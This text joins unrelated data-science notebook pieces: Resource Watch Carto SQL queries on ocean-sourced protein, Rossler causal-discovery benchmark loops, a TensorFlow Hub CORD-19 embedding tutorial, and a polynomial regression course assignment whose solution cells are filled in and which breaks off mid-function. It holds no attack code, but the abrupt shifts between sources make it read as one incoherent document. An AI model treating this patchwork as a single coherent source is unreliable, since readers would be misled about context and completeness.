query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT CONCAT(rank, ' of ', max_rank) AS value FROM (SELECT gid_0, geostore_prod,rank, MAX(rank) OVER (PARTITION BY true) AS max_rank FROM (SELECT gid_0, geostore_prod,RANK() OVER(ORDER BY prop DESC) as rank FROM (SELECT area, SUM(CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END)/NULLIF(SUM(CASE WHEN item = 'Grand Total' THEN value ELSE 0 END),0) prop FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018 GROUP BY area) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE prop is not null AND coastal = true) ranked GROUP BY rank, geostore_prod, gid_0) max_rank WHERE {{geostore_env}} ILIKE '{{geostore_id}}'](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20CONCAT(rank,%20%27%20of%20%27,%20max_rank)%20AS%20value%20FROM%20(SELECT%20gid_0,%20geostore_prod,rank,%20MAX(rank)%20OVER%20(PARTITION%20BY%20true)%20AS%20max_rank%20FROM%20(SELECT%20gid_0,%20geostore_prod,RANK()%20OVER(ORDER%20BY%20prop%20DESC)%20as%20rank%20FROM%20(SELECT%20area,%20SUM(CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END)/NULLIF(SUM(CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END),0)%20prop%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018%20GROUP%20BY%20area)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20prop%20is%20not%20null%20AND%20coastal%20=%20true)%20ranked%20GROUP%20BY%20rank,%20geostore_prod,%20gid_0)%20max_rank%20WHERE%20gid_0%20ILIKE%20%27MEX%27)
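The `{{geostore_env}}` and `{{geostore_id}}` placeholders are substituted client-side before the SQL is sent to the Carto API (in the example link above they become `gid_0` and `'MEX'`). A minimal sketch of that substitution step; the `fill_template` helper is illustrative, not part of the Resource Watch codebase:

```python
def fill_template(sql, geostore_env, geostore_id):
    """Replace the {{...}} placeholders used in Resource Watch widget SQL."""
    return (sql
            .replace('{{geostore_env}}', geostore_env)
            .replace('{{geostore_id}}', geostore_id))

# shortened template, same placeholder mechanics as the rank query above
template = "SELECT value FROM t WHERE {{geostore_env}} ILIKE '{{geostore_id}}'"
query = fill_template(template, 'gid_0', 'MEX')
# the filled query is then URL-encoded into https://wri-rw.carto.com/api/v2/sql?q=...
```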
## Value
Description: Blue protein as a proportion of total protein
Query:
```sql
SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE
WHEN item = 'Ocean-Sourced Foods' THEN value
ELSE 0
END ocean_value,
CASE
WHEN item = 'Grand Total' THEN value
ELSE 0
END total_value
FROM ocn_calcs_015_blue_food_protein_supply
WHERE year = 2018) data
LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area
LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0
WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'
GROUP BY area
```
query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END ocean_value, CASE WHEN item = 'Grand Total' THEN value ELSE 0 END total_value FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' GROUP by area](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20SUM(ocean_value)/NULLIF(SUM(total_value),0)*100%20AS%20value%20FROM%20(SELECT%20area,%20year,%20item,%20CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END%20ocean_value,%20CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END%20total_value%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20gadm.gid_0%20ILIKE%20%27MEX%27%20GROUP%20by%20area)
## RW API
- [back office](https://resourcewatch.org/admin/data/widgets/731293a0-b92f-4804-b59c-69a1d794ad73/edit?dataset=9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- parent dataset [foo_061](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)
- dataset id: `9e1b3cad-db6f-44b0-b6fb-048df7b6c680`
- widget id: `731293a0-b92f-4804-b59c-69a1d794ad73`
Rossler performance experiments
```
import numpy as np
import torch
import sys
sys.path.append("../")
import utils as utils
import NMC as models
import importlib
```
## SVAM
```
# LiNGAM / SVAM performance with sparse data
import warnings
warnings.filterwarnings("ignore")
for p in [10, 50]:
perf = []
for i in range(20):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
# format for NeuralODE
data = torch.from_numpy(data[:, None, :].astype(np.float32))
from benchmarks.lingam_benchmark import lingam_method
importlib.reload(utils)
graph = lingam_method(data.squeeze().detach())
        perf.append(utils.compare_graphs(GC, graph))  # tpr, fdr, auc
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
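The aggregation at the end of the loop relies on `perf` being a flat sequence of `(TPR, FDR, AUC)` triples that `np.reshape` folds back into rows, one per run. A standalone illustration of that pattern with made-up scores:

```python
import numpy as np

# each run contributes one (tpr, fdr, auc) triple, e.g. from compare_graphs
perf = [(1.0, 0.0, 0.9), (0.8, 0.2, 0.7)]

# fold into shape (n_runs, 3), then aggregate each metric column
scores = np.reshape(perf, (-1, 3))
means = np.mean(scores, axis=0)  # per-metric means
stds = np.std(scores, axis=0)
```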
## DCM
```
# DCM performance with sparse data
for p in [10, 50]:
perf = []
for i in range(10):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
from benchmarks.DCM import DCM_full
graph = DCM_full(data, lambda1=0.001, s=4, w_threshold=0.1)
# plt.matshow(abs(graph),cmap='Reds')
# plt.colorbar()
# plt.show()
        perf.append(utils.compare_graphs(GC, graph))  # tpr, fdr, auc
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
## PCMCI
```
# pcmci performance with sparse data
for p in [10, 50]:
perf = []
for i in range(5):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
from benchmarks.pcmci import pcmci
importlib.reload(utils)
graph = pcmci(data)
        perf.append(utils.compare_graphs(GC, graph))  # tpr, fdr, auc
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
## NGM
```
# NGM performance with sparse data
import warnings
warnings.filterwarnings("ignore")
for p in [10, 50]:
perf = []
for i in range(5):
# Simulate data
T = 1000
num_points = T
data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)
# format for NeuralODE
data = torch.from_numpy(data[:, None, :])
import NMC as models
func = models.MLPODEF(dims=[p, 12, 1], GL_reg=0.1)
# GL training
models.train(func, data, n_steps=2000, plot=False, plot_freq=20)
# AGL training
# weights = func.group_weights()
# func.GL_reg *= (1 / weights)
# func.reset_parameters()
# models.train(func,data,n_steps=1000,plot = True, plot_freq=20)
graph = func.causal_graph(w_threshold=0.1)
        perf.append(utils.compare_graphs(GC, graph))  # tpr, fdr, auc
print("Means and standard deviations for TPR, FDR and AUC with", p, "dimensions")
print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))
```
#### Copyright 2019 The TensorFlow Hub Authors.
Licensed under the Apache License, Version 2.0 (the "License");
```
# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
```
# Exploring the TF-Hub CORD-19 Swivel Embeddings
<table class="tfo-notebook-buttons" align="left">
  <td><a target="_blank" href="https://tensorflow.google.cn/hub/tutorials/cord_19_embeddings_keras"><img src="https://tensorflow.google.cn/images/tf_logo_32px.png">View on TensorFlow.org</a></td>
  <td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb"><img src="https://tensorflow.google.cn/images/colab_logo_32px.png">Run in Google Colab</a></td>
  <td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb"><img src="https://tensorflow.google.cn/images/GitHub-Mark-32px.png">View source on GitHub</a></td>
  <td><a href="https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/cord_19_embeddings_keras.ipynb">Download notebook</a></td>
</table>
The CORD-19 Swivel text embedding module on TF-Hub (https://tfhub.dev/tensorflow/cord-19/swivel-128d/3) was built to support researchers analyzing natural-language text related to COVID-19. These embeddings were trained on the titles, authors, abstracts, body texts, and reference titles of articles in the [CORD-19 dataset](https://pages.semanticscholar.org/coronavirus-research).
In this Colab we will:
- Analyze semantically similar words in the embedding space
- Train a classifier on the SciCite dataset using the CORD-19 embeddings
## Setup
```
import functools
import itertools
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_hub as hub
from tqdm import trange
```
# Analyze the embeddings
Let's start by analyzing the embeddings by computing and plotting a correlation matrix between different terms. If the embeddings learned to successfully capture the meaning of different words, the embedding vectors of semantically similar words should be close together. Let's look at some COVID-19-related terms.
```
# Use the inner product between two embedding vectors as the similarity measure
def plot_correlation(labels, features):
corr = np.inner(features, features)
corr /= np.max(corr)
sns.heatmap(corr, xticklabels=labels, yticklabels=labels)
# Generate embeddings for some terms
queries = [
# Related viruses
'coronavirus', 'SARS', 'MERS',
# Regions
'Italy', 'Spain', 'Europe',
# Symptoms
'cough', 'fever', 'throat'
]
module = hub.load('https://tfhub.dev/tensorflow/cord-19/swivel-128d/3')
embeddings = module(queries)
plot_correlation(queries, embeddings)
```
We can see that the embeddings successfully captured the meaning of the different terms. Each word is similar to the other words in its cluster (i.e., "coronavirus" correlates highly with "SARS" and "MERS") while differing from terms in other clusters (i.e., the similarity between "SARS" and "Spain" is close to 0).
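`plot_correlation` uses the inner product scaled by the global maximum, which behaves like an (unnormalized) cosine similarity. A tiny standalone sketch of why vectors pointing in similar directions score near 1 while unrelated ones score near 0 (the three toy vectors are made up, not real embeddings):

```python
import numpy as np

# toy 3-d "embeddings": the first two point in nearly the same direction
sars = np.array([1.0, 0.9, 0.0])
mers = np.array([0.9, 1.0, 0.1])
spain = np.array([0.0, 0.1, 1.0])

def cosine(a, b):
    # inner product normalized by vector lengths
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

sim_related = cosine(sars, mers)      # close to 1
sim_unrelated = cosine(sars, spain)   # close to 0
```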
Now let's see how these embeddings can be used to solve a specific task.
## SciCite: citation intent classification
This section shows how the embeddings can be used for downstream tasks such as text classification. We'll use the [SciCite dataset](https://tensorflow.google.cn/datasets/catalog/scicite) from TensorFlow Datasets to classify citation intents in academic papers. Given a sentence containing a citation from an academic paper, classify the main intent of the citation: providing background information, using a method, or comparing results.
```
builder = tfds.builder(name='scicite')
builder.download_and_prepare()
train_data, validation_data, test_data = builder.as_dataset(
split=('train', 'validation', 'test'),
as_supervised=True)
#@title Let's take a look at a few labeled examples from the training set
NUM_EXAMPLES = 10#@param {type:"integer"}
TEXT_FEATURE_NAME = builder.info.supervised_keys[0]
LABEL_NAME = builder.info.supervised_keys[1]
def label2str(numeric_label):
m = builder.info.features[LABEL_NAME].names
return m[numeric_label]
data = next(iter(train_data.batch(NUM_EXAMPLES)))
pd.DataFrame({
TEXT_FEATURE_NAME: [ex.numpy().decode('utf8') for ex in data[0]],
LABEL_NAME: [label2str(x) for x in data[1]]
})
```
## Train a citation intent classifier
We'll use Keras to train a classifier on the [SciCite dataset](https://tensorflow.google.cn/datasets/catalog/scicite). Let's build a model that uses the CORD-19 embeddings with a classification layer on top.
```
#@title Hyperparameters { run: "auto" }
EMBEDDING = 'https://tfhub.dev/tensorflow/cord-19/swivel-128d/3' #@param {type: "string"}
TRAINABLE_MODULE = False #@param {type: "boolean"}
hub_layer = hub.KerasLayer(EMBEDDING, input_shape=[],
dtype=tf.string, trainable=TRAINABLE_MODULE)
model = tf.keras.Sequential()
model.add(hub_layer)
model.add(tf.keras.layers.Dense(3))
model.summary()
model.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
```
## Train and evaluate the model
Let's train and evaluate the model to see how it performs on the SciCite task.
```
EPOCHS = 35#@param {type: "integer"}
BATCH_SIZE = 32#@param {type: "integer"}
history = model.fit(train_data.shuffle(10000).batch(BATCH_SIZE),
epochs=EPOCHS,
validation_data=validation_data.batch(BATCH_SIZE),
verbose=1)
from matplotlib import pyplot as plt
def display_training_curves(training, validation, title, subplot):
if subplot%10==1: # set up the subplots on the first call
plt.subplots(figsize=(10,10), facecolor='#F0F0F0')
plt.tight_layout()
ax = plt.subplot(subplot)
ax.set_facecolor('#F8F8F8')
ax.plot(training)
ax.plot(validation)
ax.set_title('model '+ title)
ax.set_ylabel(title)
ax.set_xlabel('epoch')
ax.legend(['train', 'valid.'])
display_training_curves(history.history['accuracy'], history.history['val_accuracy'], 'accuracy', 211)
display_training_curves(history.history['loss'], history.history['val_loss'], 'loss', 212)
```
## Evaluate the model
Let's see how the model performs. It returns two values: the loss (a number representing the error; lower values are better) and accuracy.
```
results = model.evaluate(test_data.batch(512), verbose=2)
for name, value in zip(model.metrics_names, results):
print('%s: %.3f' % (name, value))
```
We can see that the loss decreases quickly while the accuracy increases quickly. Let's plot some examples to check how the predictions relate to the true labels:
```
prediction_dataset = next(iter(test_data.batch(20)))
prediction_texts = [ex.numpy().decode('utf8') for ex in prediction_dataset[0]]
prediction_labels = [label2str(x) for x in prediction_dataset[1]]
predictions = [label2str(x) for x in np.argmax(model.predict(np.array(prediction_texts)), axis=1)]  # Sequential.predict_classes was removed in newer TF versions
pd.DataFrame({
TEXT_FEATURE_NAME: prediction_texts,
LABEL_NAME: prediction_labels,
'prediction': predictions
})
```
We can see that for this random sample the model predicts the correct label most of the time, which indicates that it can embed scientific sentences quite well.
# What's next
Now that you have learned more about the CORD-19 Swivel embeddings from TF-Hub, we encourage you to participate in the CORD-19 Kaggle competition to contribute to gaining scientific insights from COVID-19-related academic texts.
- Participate in the [CORD-19 Kaggle Challenge](https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge)
- Learn more about the [COVID-19 Open Research Dataset (CORD-19)](https://pages.semanticscholar.org/coronavirus-research)
- See the documentation and learn more about the TF-Hub embeddings at https://tfhub.dev/tensorflow/cord-19/swivel-128d/3
- Explore the CORD-19 embedding space with the [TensorFlow Embedding Projector](http://projector.tensorflow.org/?config=https://storage.googleapis.com/tfhub-examples/tensorflow/cord-19/swivel-128d/3/tensorboard/projector_config.json)
# Polynomial Regression and Cross Validation
For the first assignment we will do something that might seem familiar from *Probability Theory for Machine Learning*: trying to fit a polynomial function to a provided dataset. Fitting a function is a quintessential example of *supervised learning*, specifically *regression*, making it a great place to start using machines to learn about *machine learning*. There are several concepts here that are applicable to lots of *supervised learning* algorithms, so it will be good to cover them in a familiar context first.
The notion of a *cost function* will be introduced here, which describes how well a given model fits the provided data. This function can then be minimized in several different ways, depending on the complexity of the model and associated cost function, e.g. using *gradient descent* to iteratively approach the minimum or computing the minimum directly using an analytic method, both of which you may have seen some version of before.
We will start with the most basic model (linear) and compute the parameters that minimize the cost function directly, based on the derivative. It is important that you try to comprehend what you are doing in this most basic version (instead of just blindly trying to implement functions until they seem to work), as it will help you understand the more complex models that use the same principles later on. This means actually **watching the linked videos** and computing the partial derivatives yourself to verify you understand all of the steps.
The other common concept introduced is model selection using *cross validation*. In this assignment it will be used to determine the degree of the polynomial we are fitting. Both cross validation for model selection and minimizing the cost function to achieve the best possible fit are used in many other supervised models, for example *neural networks*.
## Material
The material for this assignment is based on sections **2.6 - 2.8** and **4.6 - 4.8** of the book *[Introduction to Machine Learning](https://www.cmpe.boun.edu.tr/~ethem/i2ml3e/)* by Ethem Alpaydin. In addition, there will be links to videos from Andrew Ng's *[Machine Learning course on Coursera](https://www.coursera.org/learn/machine-learning)* to provide some extra explanations and help create intuitions.
Generally speaking, using built-in functions will be fine for this course, but for this assignment you **may not** use any of the polynomial functions listed [here](https://docs.scipy.org/doc/numpy/reference/routines.polynomials.poly1d.html) or other built-in polynomial solution methods. You can of course use them to check your own implementations work correctly.
In total there are *27* points available in this exercise. Below are some imports to get you started. You do not need to add any code for this cell to work, just make sure you run the cell to actually import the libraries in your notebook.
```
%matplotlib inline
import numpy as np
from numpy.linalg import inv
import matplotlib.pyplot as plt
from IPython.display import YouTubeVideo
```
## Loading the data [1 pt]
Write a function to read the data stored in the file `points.csv` and convert it to a *Numpy* array. Each line in the file is a data point consisting of an **x**-value and **r**-value, separated by a comma. You could use Numpy's [loadtxt](https://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html), or any other method of your choice to read csv-files and convert that to the correct type.
Test your function and print the resulting array to make sure you know what the data looks like.
```
# YOUR SOLUTION HERE
data = np.loadtxt('points.csv', delimiter=',')
data
```
## Plotting the points [2 pt]
Write a function `split_X_R` to separate your `data` into an X matrix and an R matrix using [slicing](https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html).
Using both vectors, create a graph containing the plotted points you just read from the file. For this you can use the *matplotlib* functions [plot](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot) and [show](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.show). A plot of data should be visible below your code. HINT: [You can check the shapes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) of X and R, they should both be (30,1).
```
def split_X_R(data):
# YOUR SOLUTION HERE
X = np.array([data[:,0]]).T
R = np.array([data[:,1]]).T
return X, R
# YOUR SOLUTION HERE
X, R = split_X_R(data)
plt.scatter(X, R)
plt.show()
```
## Defining the linear model [1 pt]
Now we are going to try to find the function which best relates these points. We will start by fitting a simple linear function of the form
(2.15) $$g(x) = w_1x + w_0$$
*For more detailed description of linear regression, watch Andrew's videos on the topic. The notation is slightly different, $y$ instead of $r$ for the output, and $\theta$ instead of $w$ for the model parameters, but the actual model is identical.*
```
display(YouTubeVideo('ls7Ke48jCt8'))
display(YouTubeVideo('PBZUjnGuXjA'))
```
Now write a function that computes the predicted output value $g(x)$ given a value of $x$ and the parameters $w_0$ and $w_1$. This should be very straightforward, but make sure you understand what part this plays in our supervised learning problem before moving on.
```
def linear_model(w0, w1, x):
# YOUR SOLUTION HERE
return w0+w1*x
```
## Creating the cost function [2 pt]
The cost function is defined as the sum of the squared errors of each prediction
(2.16) $$E(w_1, w_0|X) = \frac{1}{N}\sum^N_{t=1} [r^t - (w_1x^t + w_0)]^2$$
*These videos are great for building intuition on the relation between the hypothesis function and the associated cost of that hypothesis for the data.*
```
display(YouTubeVideo('EANr4YttXIQ'))
display(YouTubeVideo('J5vJFwQWOaY'))
```
Write a function to compute the cost based on the dataset $X$, $R$ and parameters $w_0$ and $w_1$. Based on your plot of the data, try to estimate some sensible values for $w_0$ and $w_1$ and compute the corresponding cost. Try at least 3 different guesses and print their cost. Order the prints of your guesses from highest to lowest cost.
```
def linear_cost(w0, w1, X, R):
# YOUR SOLUTION HERE
return np.sum((w0+w1*X-R)**2)/len(R)
# Guess 1 w0=-200, w1=100
print(linear_cost(-200, 100, X, R))
# Guess 2 w0=-100, w1=10
print(linear_cost(-100, 10, X, R))
# Guess 3 w0=0, w1=0
print(linear_cost(0, 0, X, R))
```
## Fitting the linear model [4 pt]
We can find the minimum value of the cost function by taking the partial derivatives of that cost function for both of the weights $w_0$ and $w_1$ and setting them equal to $0$, resulting in the equations
(2.17a) $$w_1 = \frac{\sum_tx^tr^t - \bar{x}\bar{r}N}{\sum_t(x^t)^2 - N\bar{x}^2}$$
(2.17b) $$w_0 = \bar{r} - w_1\bar{x}$$
You can compute the partial derivatives of equation *2.16* yourself and set them both equal to zero, to check you understand where these two equations come from. Minimizing the cost function gives us the best possible parameters for a linear model predicting the values of the provided dataset. *Note:* If you are unfamiliar with the notation $\bar{x}$, it is defined in *Alpaydin* too, below equation *2.17*.
Write a function which computes the optimal values of $w_0$ and $w_1$ for a dataset consisting of the vectors $X$ and $R$, containing $N$ elements each. Use *matplotlib* again to plot the points, but now also add the line representing the hypothesis function you found. As the line is linear, you can simply plot it by computing the 2 end points and have *matplotlib* draw the connecting line.
Note that with some clever [array operations](https://docs.scipy.org/doc/numpy/reference/routines.array-manipulation.html) and [linear algebra](https://docs.scipy.org/doc/numpy/reference/routines.linalg.html) you can avoid explicitly looping over all the elements in $X$ and $R$ in `linear_fit`, which will make your code a lot faster. However, this is just an optional extra and any working implementation of the equations above will be considered correct.
```
def linear_fit(X, R, N):
# YOUR SOLUTION HERE
xbar = np.mean(X)
rbar = np.mean(R)
w1 = (np.sum(X*R) - xbar*rbar*N) / (np.sum(X**2) - N*xbar**2)
w0 = rbar - w1*xbar
return w0,w1
# YOUR SOLUTION HERE
plt.scatter(X, R)
w0,w1 = linear_fit(X, R, len(R))
y1 = linear_model(w0, w1, -5)
y2 = linear_model(w0, w1, 5)
plt.plot([-5,5], [y1,y2])
plt.show()
```
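As noted in the introduction, the built-in polynomial routines may be used to check your own implementation. A standalone sanity check of equations 2.17a/2.17b against `np.polyfit` on synthetic data:

```python
import numpy as np

# synthetic noisy linear data with known slope 2 and intercept 1
rng = np.random.default_rng(0)
x = np.linspace(-5, 5, 30)
r = 2.0 * x + 1.0 + rng.normal(0, 0.1, size=x.shape)

# closed-form solution from equations 2.17a / 2.17b
N = len(x)
xbar, rbar = np.mean(x), np.mean(r)
w1 = (np.sum(x * r) - xbar * rbar * N) / (np.sum(x ** 2) - N * xbar ** 2)
w0 = rbar - w1 * xbar

# np.polyfit solves the same least-squares problem (coefficients highest order first)
w1_ref, w0_ref = np.polyfit(x, r, 1)
```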
## Polynomial data [3 pt]
The linear model can easily be extended to polynomials of any order by expanding the original input with the squared input $x^2$, the cubed input $x^3$, etc and adding additional weights to the model. For ease of calculation, the input is also expanded with a vector of $1$'s, to represent the input for the constant parameter $w_0$. The parameters then become $w_0$, $w_1$, $w_2$, etc., one factor for each term of the polynomial.
So if originally the dataset of $N$ elements is of the form $X$ (superscripts are indices here)
$$ X = \left[\begin{array}{c} x^1 \\ x^2 \\ \vdots \\ x^N \end{array} \right]$$
Then the matrix $D$ for a $k^{th}$-order polynomial becomes
$$ D = \left[\begin{array}{cccc}
1 & x^1 & (x^1)^2 & \cdots & (x^1)^k \\
1 & x^2 & (x^2)^2 & \cdots & (x^2)^k \\
\vdots \\
1 & x^N & (x^N)^2 & \cdots & (x^N)^k \\
\end{array} \right]$$
Write a function `create_D_matrix` that constructs this matrix for a given vector $X$ up to the specified order $k$. Looking at plots for the dataset we have been using so far, the relationship between the points will probably be at least quadratic. Use the function to construct a matrix $D$ of order $2$, print the matrix and verify that it looks correct.
```
def create_D_matrix(X, k):
# YOUR SOLUTION HERE
return np.array([X.reshape(len(X),)**i for i in range(k+1)]).T
D = create_D_matrix(X, 2)
```
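The matrix $D$ is a Vandermonde matrix, so a quick way to check a `create_D_matrix` implementation (built-ins are allowed for checking your work) is to compare against `np.vander` with `increasing=True`:

```python
import numpy as np

X = np.array([[1.0], [2.0], [3.0]])
k = 2

# same construction as create_D_matrix: columns x^0, x^1, ..., x^k
D = np.array([X.reshape(len(X),) ** i for i in range(k + 1)]).T

# np.vander with increasing=True builds exactly this design matrix
D_ref = np.vander(X.ravel(), k + 1, increasing=True)
```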
## Polynomial model [2 pt]
The parameters can now be represented as
$$ w = \left[\begin{array}{c} w_0 \\ w_1 \\ \vdots \\ w_k \end{array} \right]$$
The hypothesis for a single input then just becomes
$$ g(x^1) = \sum_{i=0}^k D^1_iw_i $$
This can be written as a matrix multiplication for all inputs in a single equation
$$ \left[\begin{array}{cccc}
1 & x^1 & (x^1)^2 & \cdots & (x^1)^k \\
1 & x^2 & (x^2)^2 & \cdots & (x^2)^k \\
\vdots \\
1 & x^N & (x^N)^2 & \cdots & (x^N)^k \\
\end{array} \right]
\left[\begin{array}{c} w_0 \\ w_1 \\ \vdots \\ w_k \end{array} \right] = \left[\begin{array}{c} g(x^1) \\ g(x^2) \\ \vdots \\ g(x^N) \end{array} \right]$$
You can do matrix multiplication using the [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) function. Write 2 functions for computing the polynomial below
* `poly_val` should take a single input value $x$ and a vector of polynomial weights $W$ and compute the single hypothesis value for that input. We can use this function later to show the polynomial that we have fitted (just like the function `linear_model`).
* `poly_model` should take a matrix $D$ and weight vector $W$ and compute the corresponding vector of hypotheses.
```
def poly_val(x, W):
# YOUR SOLUTION HERE
return np.dot(np.array([x**i for i in range(len(W))]),W)
def poly_model(D, W):
# YOUR SOLUTION HERE
return np.dot(D, W)
```
## Polynomial cost function and model fitting [3 pts]
And for the cost function we can now use
$$ E(w|X) = \frac{1}{2N} \sum_{t=1}^N [r^t - D^tw]^2$$
Here, we compute the hypothesis $g(x)$ for every example using $D^tw$, take the difference with the actual output $r$ and finally square and sum each difference. Note that this is extremely similar to the mean squared error function we used for the linear case, and also that minimizing this error function is actually equivalent to maximizing the log likelihood of the parameter vector $w$ (see equations $4.31$ and $4.32$).
Now we have the cost function equation and can again take the partial derivative for each of the weights $w_0$ to $w_k$ and set their value equal to $0$. Solving the resulting system of equations will give the set of weights that minimize the cost function. The weights describing this lowest point of the cost function are the parameters which will produce the line that best fits our dataset.
Solving all the partial derivative equations for each weight can actually be done with just a couple of matrix operations. Deriving the equation yourself can be a bit involved, but know that the principle is exactly the same as for the linear model computing just $w_0$ and $w_1$. The final equation for the weight vector becomes
(4.33) $$ w = (D^TD)^{-1}D^Tr $$
Numpy has built in functions for [transpose](https://docs.scipy.org/doc/numpy/reference/generated/numpy.transpose.html) and [inverse](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.inv.html). Use them to write the code for the following functions.
* `poly_cost` should return the total cost $E$ given $w$, $D$ and $r$. We can use this to see how good a fit is.
* `poly_fit` should return the vector $w$ that best fits the polynomial relationship between matrix $D$ and vector $r$
Using the quadratic matrix $D$ you constructed earlier and this `poly_fit` function, find the best-fitting weights for a quadratic polynomial on the data and print these weights.
```
def poly_cost(W, D, R):
# YOUR SOLUTION HERE
return np.sum((R - np.dot(D,W))**2) / (2*len(R))
def poly_fit(D, R):
# YOUR SOLUTION HERE
return np.dot(np.dot(inv(np.dot(np.transpose(D),D)),np.transpose(D)),R)
# YOUR SOLUTION HERE
W = poly_fit(D, R)
print(W)
```
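A side note on numerical stability: for higher orders, $D^TD$ in equation 4.33 can become ill-conditioned, and explicitly inverting it loses precision. `np.linalg.lstsq` solves the same least-squares problem without forming the inverse; a standalone sketch comparing the two on data with a known quadratic relationship:

```python
import numpy as np
from numpy.linalg import inv

# small design matrix (columns 1, x, x^2) with exactly quadratic targets
x = np.array([-1.0, 0.0, 1.0, 2.0])
D = np.vander(x, 3, increasing=True)
R = 1.0 + 2.0 * x + 3.0 * x ** 2

# normal-equation solution, as in poly_fit (equation 4.33)
w_normal = inv(D.T @ D) @ D.T @ R

# least-squares solver: no explicit matrix inverse
w_lstsq, *_ = np.linalg.lstsq(D, R, rcond=None)
```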
## Plotting polynomials [1 pt]
Now let's try to figure out what our fitted quadratic polynomial looks like. As the function is not linear, we will need more than just 2 points to actually plot the line. The easiest solution is to create a whole bunch of x-values as samples, compute the corresponding y-values and plot those. With enough samples the line will look smooth, even if it is connected with linear segments.
To create these x-value samples, we can use the function [linspace](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html). Then just use the `poly_val` function you wrote earlier and apply it to every x-value to compute the array of y-values. Then plot the original datapoints as dots and the hypothesis as a line, just as for the linear plot. Don't forget to show your plot at the end.
Use these steps to fill in the `poly_plot` function below and show the polynomial function defined by the weights you found for the quadratic polynomial.
```
def poly_plot(W, X, R):
# YOUR SOLUTION HERE
x = np.linspace(-5,5,100)
y = [poly_val(xi, W) for xi in x]
plt.scatter(X,R)
plt.plot(x, y)
